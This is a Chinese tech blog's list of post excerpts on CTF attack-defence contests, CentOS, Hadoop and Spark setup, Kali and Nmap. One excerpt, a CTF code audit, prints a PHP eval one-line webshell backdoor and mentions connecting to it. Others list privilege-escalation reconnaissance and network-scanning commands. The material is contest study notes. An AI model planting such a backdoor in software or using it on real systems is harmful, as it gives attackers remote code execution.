- 博客(36)
- 收藏
- 关注
RSS订阅
原创 CTF线下AWD攻防步骤总结
AWD竞赛前半个小时应熟悉配置环境。准备网线、网线转接口最好的防御就是攻击,一定要做好安全加固本次记录的目的是为了给自己一个月来的准备弄个交代,感觉自己跟大佬们差的很远,只拿了三等,往后的路还很长,还是需要亿点点的努力,无限进步.赛前准备常用工具:Burpsuitesqlmapnmap、masscanncD盾Xshell、Xftp菜刀或蚁剑Chrome、Firefox...
2019-10-20 20:44:40
23943
6
原创 Python使用BeautifulSoup与selenium爬取Boos直聘
数据采集数据采集(Date Capture),又叫做数据获取,数据采集是将系统需要管理的所有对象的原始数据(外部数据)进行一系列的操作并输入到系统内部的一个接口。像摄像头、麦克风等等,都是数据采集工具,而在计算机世界,相应的数据采集工具就更多了,简单的采集工具有Hawk、八爪鱼等。在计算机广泛应用的今天,数据采集在多个领域具有非常重要的意义。它是计算机与外部物理世界连接的桥梁。前几个月做了一个...
2019-10-02 19:13:14
952
原创 win10 Git修改打开时的路径与上传文件夹到GitHub
修改git快捷方式将Git快捷方式发送到桌面上,打开属性设置上传文件夹到GitHub配置免密ssh-keygen -t rsa接下来,切换到个人github账号里,点击右上角用户头像下的小三角,找到setting,在右侧菜单栏中找到SSH and GPG keys,选择new SSH key,输入title,下面key的内容就是本机ssh key 公钥,直接将id_rsa.pub...
2019-10-29 20:04:30
301
原创 vsphere报错: 连接到虚拟机控制台失败并显示错误:VMRC 控制台的连接已断开。正在尝试重新连接
解决:从 Windows 任务管理器停止 vmware-vmrc.exe *32 服务卸载然后重新安装 vSphere Client重启电脑
2019-10-24 10:48:04
2801
原创 Hive报错:javax.jdo.JDOFatalDataStoreException: Unable to open a test connection to the given database.
Starting Hive Metastore ServerSLF4J: Class path contains multiple SLF4J bindings.SLF4J: Found binding in [jar:file:/usr/hive/apache-hive-2.1.1-bin/lib/log4j-slf4j-impl-2.4.1.jar!/org/slf4j/impl/Sta...
2019-10-23 21:16:31
2211
原创 源码安装httpd报错: checking for APR... configure: error: the --with-apr parameter is incorrect.
使用源码安装httpd时,执行命令./configure --prefix=/usr/local/apachechecking for APR... configure: error: the --with-apr parameter is incorrect. It must specify an install prefix, a build directory, or an apr-co...
2019-10-23 18:19:22
9951
2
原创 Hive启动报错 Could not create ServerSocket on address 0.0.0.0/0.0.0.0:9083
Exception in thread "main" org.apache.thrift.transport.TTransportException: Could not create ServerSocket on address 0.0.0.0/0.0.0.0:9083. at org.apache.thrift.transport.TServerSocket.<init>(TS...
2019-10-22 20:29:29
1936
1
原创 ctf线下AWD攻防赛学习笔记
ctf线下AWD攻防赛学习笔记CTF线下攻防赛主要以攻防模式(Attack & Defense)来呈现。一般在这种模式下,一支参赛队伍有三名队员,所有的参赛队伍都会有同样的初始环境,包含若干台服务器。参赛队伍挖掘漏洞,通过攻击对手的服务器获取Flag来得分,以修补自身服务器的漏洞防止扣分。在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。题目类型语...
2019-10-20 20:45:27
10428
原创 解决httpd: Could not reliably determine the server's fully qualified domain name
修改httpd.confvim /etc/httpd/conf/httpd.conf将里面的 #ServerName localhost:80 注释去掉即可。再执行 systemclt restart httpd
2019-10-16 13:05:02
420
原创 Centos7 bg与fg命令
fg 和 bg 命令调度正在运行的任务假设你发现前台运行的一个程序需要很长的时间,但是需要干其他的事情,你就可以用 Ctrl-Z ,挂起这个程序,然后可以看到系统提示(方括号中的是作业号):这里拿top举个例子[1]+ 已停止 top关于:&这个用在一个命令的最后,可以把这个命令放到后台执行ctrl + z可以将一个正在前台执行的命令放到后台,并且暂停jobs查看当前...
2019-10-15 17:38:26
1698
原创 大数据环境准备-搭建数据仓库
环境准备1.首先修改hosts文件,以自己实验ip为准。(master中进行)vim /etc/hosts然后直接将hosts文件复制到从节点中scp /etc/hosts root@slave1:/etc/hostsscp /etc/hosts root@slave2:/etc/hosts2.开启zookeeper(三台机器)进入zooke...
2019-10-13 15:31:03
393
原创 大数据基础环境搭建
实验环境:Centos7 Xshell安装包版本:hadoop-2.7.3.tar.gzapache-hive-2.1.1-bin.tarhbase-1.2.4-bin.tar.gzjdk-8u171-linux-x64.tar.gzmysql-connector-java-5.1.47-bin.jarscala-2.11.12.tgzspark-2.4.0-bin-had...
2019-10-13 15:05:50
774
原创 Centos7配置yum源安装Mysql
构建下载仓库在/etc/yum.repos.d/下新建mysql-community.repo[mysql57-community]name=MySQL 5.7 Community Serverbaseurl=https://repo.mysql.com/yum/mysql-5.7-community/el/7/$basearch/enabled=1gpgcheck=0gpgkey=...
2019-10-12 15:49:26
154
原创 Centos7配置时间同步
时间同步1.时区一致。要保证设置主机时间准确,每台机器时区必须一致。实验中我们需要同步网络时间,因此要首先选择一样的时区。先确保时区一样,否则同步以后时间也是有时区差。可以使用date查看自己的机器时间2.选择时区:tzselect由于hadoop集群对时间要求很高,所以集群内主机要经常同步。我们使用ntp进行时间同步,master作为ntp服务器,其余的当做ntp客户端。下载ntp...
2019-10-12 15:48:55
390
原创 基于PySpark的电影推荐引擎
相关知识推荐引擎是最常见的机器学习应用,我们可以在各大购物网站上看见这方面的应用。Spark MLlib支持ALS(Alternating Least Squares)推荐算法,是机器学习的协同过滤推荐算法。机器学习的协同过滤推荐算法通过观察所有用户给产品的评价来推断每个用户的喜好,并向每个用户分别推荐多个合适的产品,也可以把某个产品推荐给多个用户。系统环境Linux Centos7P...
2019-10-09 19:44:48
2046
原创 Centos7安装Anaconda详细版
操作环境centos7Anaconda版本Anaconda3-2019.07-Linux-x86_64.sh下载地址安装过程下载打开Anaconda下载地址,复制下载链接,在centos7中使用wget下载,也可以在本地下载完上传到Centos中安装在命令行运行bash Anaconda3-2019.07-Linux-x86_64.sh按照提示输入yes与按回车键...
2019-10-09 17:38:19
1178
原创 使用PySpark对招聘信息数据进行分析
使用PySpark对智联数据进行分析Spark数据处理方式主要有三种:RDD、DataFrame、Spark SQL三者的主要差异在于是否定义SchemaRDD的数据未定义Schema(也就是未定义字段名及数据类型)。使用上必须有Map/Reduce的概念,需要高级别的程序设计能力。但是功能也最强,能完成所有Spark功能。Spark DataFrame建立时必须定义Schema(...
2019-10-09 12:14:32
2008
原创 CTF AWD模式下简单的CMS代码审计
今天先把去年的AWD代码审计一下,以后有时间就把今年的AWD代码审计写一下index.php<?php include 'header.php';@eval($_REQUEST['aa']);echo 'eval';?>首先打开index.php,一目了然,可以看到头文件有一句话木马,密码是aa这里使用中国菜刀可以直接连上一句话木马,进入服务器扩展了解一句话脚本...
2019-10-08 20:26:14
3448
原创 Liunx 管理用户、组及权限
一 使用命令创建用户并赋予访问权限命令列表:命令描述Useradd添加用户Userdel删除用户Groupadd添加组Passwd更改用户密码Chmod更改目录权限Chown更改目录所有者使用groupadd命令创建用户组user_group使用useradd命令创建用户user1,要求所属组为user_group...
2019-10-08 19:07:27
886
原创 思科模拟器 使用IOS配置启用ospf路由
网络拓扑如下IP地址分配表设备名端口/接口IP地址掩码长度网关PC0Fa0172.16.1.224172.16.1.1PC1Fa07.0.0.2307.0.0.1Inter-SrvFa06.0.0.286.0.0.1FireWallFa0/0172.16.1.124 -FireWallGig0/3/02.0...
2019-10-06 19:17:53
3205
原创 网络安全 payload、shellcode、exp、poc 详解
在学习网络安全的过程中经常会听到几个名词,例如payload、shellcode、exp、poc等碰见不懂的东西就要去搞懂,于是动手查了查资料Payload是什么?是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码对于一个漏洞,他可以被利用(exploit),利用有一个完整的解决方案你可以把这个看作是名词的(exploit),然后利用必然有目的,而你的目的...
2019-10-06 13:40:35
21496
2
原创 Kali apt-get报E: 无法打开锁文件 /var/lib/dpkg/lock-frontend - open (2: 没有那个文件或目录)
Kali apt-get报E: 无法打开锁文件 /var/lib/dpkg/lock-frontend - open (2: 没有那个文件或目录)由于使用apt安装时一直报错,所以把文件夹直接删除删除一时爽,删完毁断肠解决办法:sudo mkdir -p /var/lib/dpkg/{alternatives,info,parts,triggers,updates}sudo cp /va...
2019-10-05 17:39:19
2546
原创 Kali apt报错E: 无法获得锁 /var/cache/apt/archives/lock - open (11: 资源暂时不可用)
kali apt时报错:root@kali:~# apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y E: 无法获得锁 /var/cache/apt/archives/lock - open (11: 资源暂时不可用)E: 无法对目录 ...
2019-10-05 17:30:37
773
原创 kali20119最新更新源
查看添加更新源编辑sources.list,将kali更新源加入其中sudo vim /etc/apt/sources.list#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main...
2019-10-05 17:30:06
1130
3
转载 Liunx提权常用命令
操作系统信息收集如何查看服务器的版本cat /etc/issuecat /etc/*-releasecat /etc/lsb-release # 基于 Debiancat /etc/redhat-release # 基于 Redhat如何查看内核的版本信息?cat /proc/versionuname -auname -mrsrpm -q kerneldmes...
2019-10-05 11:38:16
286
原创 MobaXterm汉化以及解决中文乱码问题
在使用MobaXterm过程中会遇到中文乱码的问题,这时候我们需要设置一下编码点击鼠标右键选择第二个ISO选项再次输入出现乱码的命令修改成功!如果设置完以后使用其他命令出现乱码,则修改回UTF-8编码即可汉化包下载:链接: https://pan.baidu.com/s/1UAxKfsSj9OOpC3ojaLN5IQ 提取码: myi3...
2019-10-04 20:02:17
36408
8
原创 centos7 使用vi编辑器配置网络环境
命令命令和路径描述ifconfig改变网卡地址,启用禁用网卡route管理本机路由表hostname设置本机主机名一 使用ifconfig命令改变网卡IP地址使用ifconfig命令查看虚拟机的IP地址使用ifconfig命令把虚拟机的地址设成192.168.238.7注意:这里我修改了静态,所以使用该命令的时候需要是DHCP才可以更改成...
2019-10-03 18:43:39
2006
原创 centos7 挂载使用外部存储系统
命令命令描述fdisk管理磁盘分区mkfs创建文件系统mount挂载文件系统umount卸载文件系统du统计目录的磁盘使用情况df统计未使用的磁盘空间一 在linux系统中挂载使用光盘在vmware虚拟机中配置光驱使用ISO光盘映像使用mount命令把光盘挂载到/mnt/cdrom查看光盘内容使用um...
2019-10-03 18:03:38
3000
原创 centos7 使用linux命令管理目录和文件
一 使用命令查看系统基本信息uname命令查看内核版本、硬件平台hostname查看修改主机名ifconfig查看修改IP地址df查看磁盘空间占用情况free查看内存空间占用情况二 使用linux命令完成如下目录和文件操作命令描述ls列出目录下的文件mkdir、cd、rmdir、pwd目录操作命令rm、mv、cp文件操作命令...
2019-10-03 17:41:40
872
原创 Centos7 图形化安装,分区,网络设置
一 使用vmware建立新的虚拟机二 安装CentOS7.4系统使用安装光盘映像引导系统,进入安装界面重新划分磁盘分区,交换分区swap为2G,“/boot”分区512M,其余的划为根分区,分区表选择DeskTop安装配置root密码为123456安装完成重新启动系统并登录三 系统登录、控制台切换、图形界面操作图形界面root超级用户的登陆控制台切换快捷...
2019-10-03 17:15:04
1825
原创 yum更新报错 您可以尝试添加 --skip-broken 选项来解决该问题
在centos7 中执行 yum -y update时系统报错:错误:软件包:kernel-3.10.0-1062.1.2.el7.x86_64 (updates) 需要:linux-firmware >= 20190429-72 正在删除: linux-firmware-20160830-49.git7534e19.el7.noarch (@ana...
2019-10-03 16:59:31
13628
2
原创 PHP代码审计工具Rips的使用
Rips0x00 介绍最近在准备CTF攻防比赛时发现了一个很好的代码审计工具,接下来就给大家介绍此工具的使用在安全工作中,代码审计是很重要的一项技能。在面对大规模的代码时,使用自动化工具辅助人工漏洞挖掘,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。它使用了静态分析技术,能够自动化地挖掘PHP源代码潜在的安全漏洞如XSS ,sql注入,敏感信息...
2019-10-02 19:29:23
5457
1
原创 Nmap工具命令详解
nmap用于网络扫描和主机检测 漏洞探测 安全扫描发现主机nmap -sP 10.0.3.0/24 发现有哪些机器,主机,路由器,交换机,跳过端口检测nmap -sn 10.0.1.161-166 ping探测扫描主机,不进行端口扫描nmap 10.0.1.161 -sA (发送tcp的ack包进行探测,可以探测主机是否存活)nmap 192.168.1.1-100 (扫描...
2019-10-02 19:28:54
613
转载 Linux下查看用户列表
以下是用到的一些命令。查看用户cat /etc/passwd查看用户组cat /etc/group查看当前活跃的用户列表w但是,你会发现,在使用上面的 cat 命令所打印出来的东西太杂乱了,于是网上找到下面的这个命令:对于 cat /etc/passwd 的替换cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdow...
2019-10-02 19:16:36
659
转载 Linux crontab命令详解
Linux crontab是用来定期执行程序的命令。当安装完成操作系统之后,默认便会启动此任务调度命令。crond命令每分锺会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。而linux任务调度的工作主要分为以下两类:系统执行的工作:系统周期性所要执行的工作,如备份系统数据、清理缓存个人执行的工作:某个用户定期要做的工作,例如每隔10分钟检查邮件服务器是否有新信,这些...
2019-10-02 19:15:58
105
转载 Liunx curl命令详解
curl 是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端(client)的 URL 工具的意思。它的功能非常强大,命令行参数多达几十种。如果熟练的话,完全可以取代 Postman 这一类的图形界面工具。不带有任何参数时,curl 就是发出 GET 请求。$ curl https://www.example.com上面命令向www.example.com发出 GET ...
2019-10-02 19:15:06
193
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人